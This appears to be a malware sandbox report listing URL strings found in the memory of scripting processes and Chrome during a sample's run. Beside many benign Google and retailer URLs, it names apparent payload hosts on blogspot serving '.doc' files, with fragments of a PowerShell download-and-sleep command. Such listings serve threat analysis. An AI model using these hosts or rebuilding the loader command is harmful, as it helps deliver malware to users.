                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266666
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266725
                      Source: chrome.exe, 00000023.00000002.289678803219.000060C400298000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266842
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266906
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266976
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42267038
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42267057
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42267095
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42267113
                      Source: powershell.exe, 00000016.00000002.289540073156.0000022B3F391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3C1FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://blogspot.l.googleusercontent.com
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
                      Source: chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=128
                      Source: chrome.exe, 00000023.00000002.289692296070.000060C400E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289654238583.000060C400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/350528343
                      Source: wscript.exe, 00000002.00000002.289300300544.000001B693A79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: wscript.exe, 00000002.00000002.289300300544.000001B693A79000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.289548240566.0000022B56E03000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289727493265.000002AA53CA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: wscript.exe, 00000002.00000002.289300300544.000001B693A79000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.289548240566.0000022B56DD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289727493265.000002AA53C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: powershell.exe, 00000016.00000002.289549409554.0000022B57123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                      Source: powershell.exe, 0000001F.00000002.289731324970.000002AA5408B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                      Source: wscript.exe, 00000002.00000002.289300300544.000001B693A79000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.289224685890.000001B6959A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                      Source: wscript.exe, 00000002.00000002.289300300544.000001B693A79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: wscript.exe, 00000002.00000002.289300300544.000001B693A79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPuG
                      Source: wscript.exe, 00000002.00000003.289224685890.000001B6959A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                      Source: wscript.exe, 00000002.00000002.289300300544.000001B693A79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
                      Source: chrome.exe, 00000023.00000002.289676644773.000060C40007D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                      Source: powershell.exe, 00000016.00000002.289540073156.0000022B3F391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3C1FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kalacpamarchclean.blogspot.com
                      Source: wscript.exe, 00000002.00000002.289300300544.000001B693A79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: wscript.exe, 00000002.00000002.289300300544.000001B693A79000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.289224685890.000001B6959A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: powershell.exe, 00000003.00000002.289648176628.0000029A43E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000003.00000002.289648176628.0000029A43E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXzTn
                      Source: powershell.exe, 00000016.00000002.289540073156.0000022B3F429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3C292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.google.com/blogger/2008
                      Source: powershell.exe, 00000016.00000002.289540073156.0000022B3F429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3C292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.google.com/g/2005
                      Source: powershell.exe, 0000001F.00000002.289697426953.000002AA3C28B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3C224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.google.com/g/2005#thumbnail
                      Source: powershell.exe, 00000003.00000002.289648176628.0000029A44005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000003.00000002.289648176628.0000029A43C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.289540073156.0000022B3EDD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3BC11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000003.00000002.289648176628.0000029A44005000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: chrome.exe, 00000023.00000002.289690506994.000060C400CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
                      Source: powershell.exe, 00000016.00000002.289549409554.0000022B57123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wicro.com
                      Source: powershell.exe, 00000003.00000002.289648176628.0000029A43E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000003.00000002.289648176628.0000029A43E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzTn
                      Source: powershell.exe, 0000001F.00000002.289697426953.000002AA3C28B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3C224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/288119108
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/292282210
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/292285899
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/309028728
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/328301788
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/328837151
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/336844257
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/347601787
                      Source: chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/349489248
                      Source: mshta.exe, 0000001E.00000002.289587119886.000001FB4AF0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kalacpamarchcle.bn
                      Source: powershell.exe, 00000016.00000002.289540073156.0000022B3EFFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.289540073156.0000022B3F3C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3C22C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3BE3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kalacpamarchclean.blogspot.com
                      Source: powershell.exe, 0000001F.00000002.289697426953.000002AA3C28B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3C224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kalacpamarchclean.blogspot.com/
                      Source: powershell.exe, 00000016.00000002.289540073156.0000022B3F3C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3C22C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kalacpamarchclean.blogspot.com/atom.xml
                      Source: powershell.exe, 00000016.00000002.289540073156.0000022B3EFFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3BE3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kalacpamarchclean.blogspot.com/chig.doc
                      Source: powershell.exe, 00000030.00000002.289861987067.000001400DDB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kalacpamarchclean.blogspot.com/chig.doc)
                      Source: powershell.exe, 00000016.00000002.289538420899.0000022B3CE47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kalacpamarchclean.blogspot.com/chig.doc)V
                      Source: powershell.exe, 0000001F.00000002.289689706318.000002AA39D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kalacpamarchclean.blogspot.com/chig.doc)s
                      Source: powershell.exe, 00000016.00000002.289540073156.0000022B3EFFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3BE3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://kalacpamarchclean.blogspot.com/chig.docXzTn
                      Source: chrome.exe, 00000023.00000002.289689896163.000060C400C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289688068452.000060C400AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmp, AvastBrowserUpdate.exeString found in binary or memory: https://m.google.com/devicemanagement/data/api
                      Source: powershell.exe, 00000003.00000002.289648176628.0000029A43E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://marchlkalanew6.blogspot.com
                      Source: svchost.exe, 0000001B.00000003.289716219780.0000018CD5639000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289716219780.0000018CD562F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289750972128.0000018CD5D02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.289740415298.0000018CD560A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep
                      Source: powershell.exe, 00000003.00000002.289646568175.0000029A41F80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.289647917859.0000029A438C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.289644863025.0000029A41CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep-Seconds6;
                      Source: powershell.exe, 00000003.00000002.289644863025.0000029A41CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep-Seconds6;?
                      Source: powershell.exe, 00000003.00000002.289644863025.0000029A41CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep934e089
                      Source: powershell.exe, 00000003.00000002.289644863025.0000029A41CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.doc);start-sleep
                      Source: powershell.exe, 00000003.00000002.289648176628.0000029A43E37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://marchlkalanew6.blogspot.com/lundchikha.docXzTn
                      Source: chrome.exe, 00000023.00000002.289687814201.000060C400A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                      Source: chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                      Source: chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                      Source: chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myshop.amplify.com/cart
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                      Source: chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                      Source: chrome.exe, 00000023.00000002.289678597125.000060C400204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
                      Source: chrome.exe, 00000023.00000002.289686838940.000060C400968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://passwords.google/
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poshmark.com/bundles/shop
                      Source: chrome.exe, 00000023.00000002.289679394257.000060C400314000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                      Source: chrome.exe, 00000023.00000002.289677608816.000060C400140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289661063590.000060C4006A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000003.289660899505.000060C400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsingohttpgateway.googleapis.com/v1/ohttp/hpkekeyconfig?key=AIzaSyBOti4mM-6x9WDnZIjIe
                      Source: chrome.exe, 00000023.00000002.289676724934.000060C400088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                      Source: wscript.exe, 00000002.00000002.289300300544.000001B693A79000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.289224685890.000001B6959A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure-oldnavy.gap.com/shopping-bag
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.newegg.com/shop/cart
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shop.advanceautoparts.com/web/OrderItemDisplay
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shop.lululemon.com/shop/mybag
                      Source: chrome.exe, 00000023.00000002.289689896163.000060C400C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289688068452.000060C400AD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/cart/
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.usps.com/store/cart/cart.jsp
                      Source: chrome.exe, 00000023.00000002.289690589537.000060C400CD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                      Source: chrome.exe, 00000023.00000002.289678405479.000060C4001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                      Source: chrome.exe, 00000023.00000002.289693137102.000060C400FAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.ico
                      Source: svchost.exe, 0000001B.00000003.289662292355.0000018CD5C5B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                      Source: chrome.exe, 00000023.00000002.289690937954.000060C400D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search
                      Source: chrome.exe, 00000023.00000002.289690937954.000060C400D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search?ei=&fr=crmas&p=
                      Source: chrome.exe, 00000023.00000002.289690937954.000060C400D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                      Source: svchost.exe, 0000001B.00000003.289662292355.0000018CD5C5B000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000023.00000002.289692770593.000060C400F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: AvastBrowserUpdate.exeString found in binary or memory: https://update.googleapis.com/service/update2
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.abebooks.com/servlet/ShopBasketPL
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.academy.com/shop/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.acehardware.com/cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.adorama.com/als.mvc/cartview
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ae.com/us/en/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.altardstate.com/cart/
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/gp/cart/view.html
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/gp/cart/view.html
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.anthropologie.com/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.apple.com/shop/bag
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.atlassian.com/purchase/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.att.com/buy/cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.backcountry.com/Store/cart/cart.jsp
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.basspro.com/shop/AjaxOrderItemDisplayView
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bathandbodyworks.com/cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bedbathandbeyond.com/store/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.belk.com/shopping-bag/
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bhphotovideo.com/find/cart.jsp
                      Source: powershell.exe, 0000001F.00000002.289697426953.000002AA3C28B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.289697426953.000002AA3C224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.blogger.com/feeds/4439465790675702951/posts/default?alt=atom
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bloomingdales.com/my-bag
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.boostmobile.com/cart.html
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bricklink.com/v2/globalcart.page
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.brownells.com/aspx/store/cart.aspx
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.buybuybaby.com/store/cart
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.carid.com/cart.php
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.chegg.com/shoppingcart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.containerstore.com/cart/list.htm
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.costco.com/CheckoutCartDisplayView
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.crateandbarrel.com/Checkout/Cart
                      Source: chrome.exe, 00000023.00000002.289686437028.000060C400918000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dickssportinggoods.com/OrderItemDisplay
                      Source: chrome.exe, 00000023.00000002.289681278813.000060C40050C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dillards.com/webapp/wcs/stores/servlet/OrderItemDisplay
                      Source: chrome.exe, 00000023.00000002.289685268197.000060C400864000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dsw.com/en/us/shopping-bag
